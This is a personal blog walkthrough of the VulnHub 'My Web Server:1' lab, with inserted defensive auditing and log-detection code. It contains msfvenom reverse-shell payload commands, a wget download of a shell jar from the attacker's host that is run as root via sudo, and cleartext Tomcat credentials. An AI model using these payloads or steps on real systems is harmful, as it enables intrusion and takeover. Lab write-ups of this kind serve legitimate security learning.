kuroto's blog

Just a diary

My Web Server:1 walkthrough

Introduction

I did this one:

www.vulnhub.com

Enumeration and attack

nmap hell

$ nmap -sV -Pn -A 192.168.111.9                                                                                    
Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-15 10:35 JST
Nmap scan report for 192.168.111.9
Host is up (0.0013s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:dc:8f:24:51:73:54:bc:87:62:a2:e6:ed:f1:c1:b4 (RSA)
|   256 a9:39:a9:bf:b2:f7:01:22:65:07:be:15:48:e8:ef:11 (ECDSA)
|_  256 77:f5:a9:ff:a6:44:7c:9c:34:41:f1:ec:73:5e:57:bd (EdDSA)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Armour – Just another WordPress site
2222/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: Radius by TEMPLATED
3306/tcp open  mysql   MySQL (unauthorized)
8081/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Visualize by TEMPLATED
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.83 seconds

Digging around with searchsploit, nostromo 1.9.6 appears to have an RCE vulnerability, so I use it to get a reverse shell.

In /etc/sudoers.d there were README and mysudo.

$ cat mysudo
tomcat ALL=(ALL) NOPASSWD:/usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java

So if I get the privileges of the tomcat user, I can get root.
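The mysudo rule above is the whole privilege-escalation path: a runtime that executes caller-supplied code, granted as root with no password and no argument restriction. As an added example (not part of the original post), here is a small audit that parses sudoers fragments and classifies each rule; the sample input embeds the rule from the box plus two constructed rules, and the list of "code runner" binaries is my own assumption, not anything the box defines.

```python
import re

# Constructed sample: the rule found in /etc/sudoers.d/mysudo on the box, followed by
# two made-up rules so the other outcomes of the classifier are visible.
SAMPLE_SUDOERS = """\
# /etc/sudoers.d/mysudo (from the post)
tomcat ALL=(ALL) NOPASSWD:/usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
# constructed rules for illustration
www-data ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup ALL=(ALL) /usr/bin/rsync
"""

# Programs that execute whatever code the caller hands them (assumed list); a sudo rule
# granting one of these without argument restrictions is a root shell with extra steps.
CODE_RUNNERS = {"java", "python", "python2", "python3", "perl", "ruby", "php",
                "node", "bash", "sh", "dash", "zsh", "env"}

# user host=(runas) TAGS: command[, command...]   (the runas spec is optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudoers(text):
    """Classify every command of every user specification; comments and Defaults are skipped."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").strip()
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            tokens = cmd.split()
            binary = tokens[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                severity, reason = "critical", "any command as %s" % runas
            elif binary in CODE_RUNNERS and len(tokens) == 1:
                severity, reason = "critical", "%s with free arguments runs arbitrary code as %s" % (binary, runas)
            elif len(tokens) == 1:
                severity, reason = "review", "arguments to %s are unrestricted" % binary
            else:
                severity, reason = "info", "arguments are pinned in the rule"
            findings.append({"line": lineno, "user": m.group("user"), "runas": runas,
                             "nopasswd": nopasswd, "command": cmd,
                             "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("%-8s line %d: %s -> %s (%s)" % (f["severity"], f["line"], f["user"], f["command"], f["reason"]))
```

The fix on a real host is not to remove NOPASSWD but to stop granting the runtime itself: pin the exact jar or script in the rule, or wrap the task in a dedicated script that sudo may run and that takes no caller-controlled arguments.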

Enumerate the tomcat user.

$ find / -name tomcat 2>/dev/null
/opt/tomcat
/usr/local/tomcat
$ cat tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
    version="1.0">

    <role rolename="manager-gui"/>
    <user username="tomcat" password="@sprot0230sp" roles="manager-gui"/>
    
    <role rolename="admin-gui"/>
    <user username="admin" password="as3epr04irto" roles="admin-gui"/>    
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
</tomcat-users>

So the tomcat password appears to be @sprot0230sp, and I log in to Tomcat with it.
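What made tomcat-users.xml decisive is the combination of a cleartext password with the manager-gui role, which is what allows web applications to be deployed. As an added example (not code from the post or from Tomcat), this check parses a tomcat-users.xml and reports, per active user, whether the credential looks cleartext and whether the roles allow deployment; the sample is modelled on the file from the box with one constructed digested user added, and the "looks digested" heuristic is my assumption.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the tomcat-users.xml found on the box: the two
# real entries from the post plus one made-up user with a digested password.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="@sprot0230sp" roles="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="admin" password="as3epr04irto" roles="admin-gui"/>
  <!-- constructed: monitoring account with a digested (SHA-256 hex) password -->
  <user username="monitor" roles="manager-status"
        password="e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"/>
</tomcat-users>
"""

# Roles that let the holder deploy a web application, i.e. run arbitrary code in the
# Tomcat JVM: the GUI and the text/script interface of the Manager application.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Roles for the Host Manager application (virtual-host changes, not code deployment).
HOST_ADMIN_ROLES = {"admin-gui", "admin-script"}

# Heuristic (assumption): a digested credential is a hex digest, optionally in the
# salted "salt$iterations$digest" form; anything else is treated as cleartext.
DIGEST_RE = re.compile(r"^(?:[0-9a-fA-F]+\$\d+\$)?[0-9a-fA-F]{32,}$")


def audit_tomcat_users(xml_text):
    """One finding per active <user>; entries inside XML comments never reach the parser."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if el.tag.split("}")[-1] != "user":   # tolerate namespaced and bare tags
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        password = el.get("password", "")
        findings.append({
            "username": el.get("username"),
            "roles": sorted(roles),
            "cleartext": not DIGEST_RE.match(password),
            "can_deploy": bool(roles & DEPLOY_ROLES),
            "host_admin": bool(roles & HOST_ADMIN_ROLES),
        })
    return findings


def high_risk(findings):
    """Users whose cleartext credential also grants code deployment."""
    return [f["username"] for f in findings if f["cleartext"] and f["can_deploy"]]


if __name__ == "__main__":
    fs = audit_tomcat_users(SAMPLE_TOMCAT_USERS)
    for f in fs:
        print(f)
    print("high risk:", high_risk(fs))
```

Run against the file from the box, the tomcat account is the only high-risk entry: readable cleartext credentials for a deploy-capable role are exactly what turned file read access into code execution here.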

Once logged in to Tomcat I can upload a war file, so I use that to get a shell.

Create the war file with msfvenom, following the article below: www.hackingarticles.in

[screenshot: war upload]

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.111.28 LPORT=8001 -f war > ./java.war                                                                                                   
Payload size: 1103 bytes
Final size of war file: 1103 bytes

Accessing the deployed application at http://192.168.111.9:8080/java/ gives a reverse shell.

$  ncat -lvp 8001                                                                                                                                                                  
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 8A35 CC8A A242 2509 93CB 0F8B 4D08 D92E 2837 C1B8
Ncat: Listening on :::8001
Ncat: Listening on 0.0.0.0:8001
Ncat: Connection from 192.168.111.9.
Ncat: Connection from 192.168.111.9:49108.
python -c "import pty;pty.spawn('/bin/bash');"
tomcat@webserver:~$

As mysudo showed, java can be run as root, so I create a jar file the same way I created the war file.

$ msfvenom java -f jar -p java/shell_reverse_tcp LHOST=192.168.111.28 LPORT=8002 -o shell.jar

Have the target download the generated shell.jar with wget or similar, then run it.

$ python2 -m SimpleHTTPServer 8080

tomcat@webserver:~$ wget http://192.168.111.28:8080/shell.jar
--2020-04-15 20:33:45--  http://192.168.111.28:8080/shell.jar
Connecting to 192.168.111.28:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7552 (7.4K) [application/java-archive]
Saving to: ‘shell.jar’

shell.jar           100%[===================>]   7.38K  --.-KB/s    in 0.02s   

2020-04-15 20:33:45 (418 KB/s) - ‘shell.jar’ saved [7552/7552]
tomcat@webserver:~$ sudo -u root java -jar shell.jar
sudo: unable to resolve host webserver: Name or service not known

Listener side

$ ncat -lvp 8002
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: EDB6 FA48 3B73 E837 AAA6 E009 EC1F 80D6 CB34 32DB
Ncat: Listening on :::8002
Ncat: Listening on 0.0.0.0:8002
Ncat: Connection from 192.168.111.9.
Ncat: Connection from 192.168.111.9:34584.
python3 -c "import pty; pty.spawn('/bin/bash');"
root@webserver:/opt/tomcat#
root@webserver:/opt/tomcat# cd /root
root@webserver:~# ls
proof.txt
root@webserver:~# cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eep2ff0LbLYZrFq
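Both steps of this chain leave distinctive traces: the Manager upload appears in Tomcat's access log, and the escalation appears as a sudo entry in auth.log naming the java binary from the mysudo rule. As an added example (not from the post), the following detection runs over constructed log lines modelled on that activity; the log formats assumed are the combined access-log format and sudo's standard syslog line, and the list of "code runner" binaries is an assumption of mine.

```python
import re

# Constructed log lines modelled on what the activity in this post would leave behind:
# Tomcat's access log (combined format) and the sudo entries in auth.log.
SAMPLE_LOGS = """\
192.168.111.28 - tomcat [15/Apr/2020:20:20:11 +0900] "GET /manager/html HTTP/1.1" 200 18432
192.168.111.28 - tomcat [15/Apr/2020:20:21:03 +0900] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 17211
192.168.111.28 - - [15/Apr/2020:20:21:40 +0900] "GET /java/ HTTP/1.1" 200 0
Apr 15 20:33:50 webserver sudo:   tomcat : TTY=pts/0 ; PWD=/opt/tomcat ; USER=root ; COMMAND=/usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java -jar shell.jar
Apr 15 20:34:12 webserver sudo:   backup : TTY=pts/1 ; PWD=/home/backup ; USER=root ; COMMAND=/bin/cat /var/log/syslog
"""

# Manager-application requests that deploy a web application (GUI upload or text interface).
MANAGER_DEPLOY_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>POST|PUT) (?P<path>/manager/(?:html/upload|text/deploy)[^ "]*)')
# sudo's syslog line: "sudo: <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ [\d:]+) \S+ sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$')
# Runtimes and interpreters (assumed list): sudo running one of these with caller-chosen
# arguments is a root shell, whatever the sudoers rule was meant to allow.
CODE_RUNNERS = {"java", "python", "python2", "python3", "perl", "ruby", "php", "node", "bash", "sh"}


def scan_logs(lines):
    """Return one alert per matching line, in input order."""
    alerts = []
    for line in lines:
        m = MANAGER_DEPLOY_RE.match(line)
        if m:
            alerts.append({"rule": "tomcat_manager_deploy", "ts": m["ts"], "src": m["src"],
                           "user": m["user"], "detail": "%s %s" % (m["method"], m["path"])})
            continue
        m = SUDO_RE.match(line)
        if m:
            binary = m["cmd"].split()[0].rsplit("/", 1)[-1]
            if binary in CODE_RUNNERS:
                alerts.append({"rule": "sudo_code_runner", "ts": m["ts"], "src": "local",
                               "user": m["user"], "detail": "%s as %s" % (m["cmd"], m["runas"])})
    return alerts


if __name__ == "__main__":
    for a in scan_logs(SAMPLE_LOGS.splitlines()):
        print("[%s] %s %s %s: %s" % (a["rule"], a["ts"], a["src"], a["user"], a["detail"]))
```

A deployment through the Manager application on a production host is rare enough to alert on every time; the sudo rule fires only when the command's binary is a runtime, so a pinned rule such as `sudo /usr/bin/systemctl restart apache2` stays quiet while the `java -jar` escalation from this box is reported.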

Conclusion

This was my first Difficulty: Medium/Intermediate Level box, but I had done similar challenges before, so it did not take that long. From now on I will be working on OSCP-like boxes.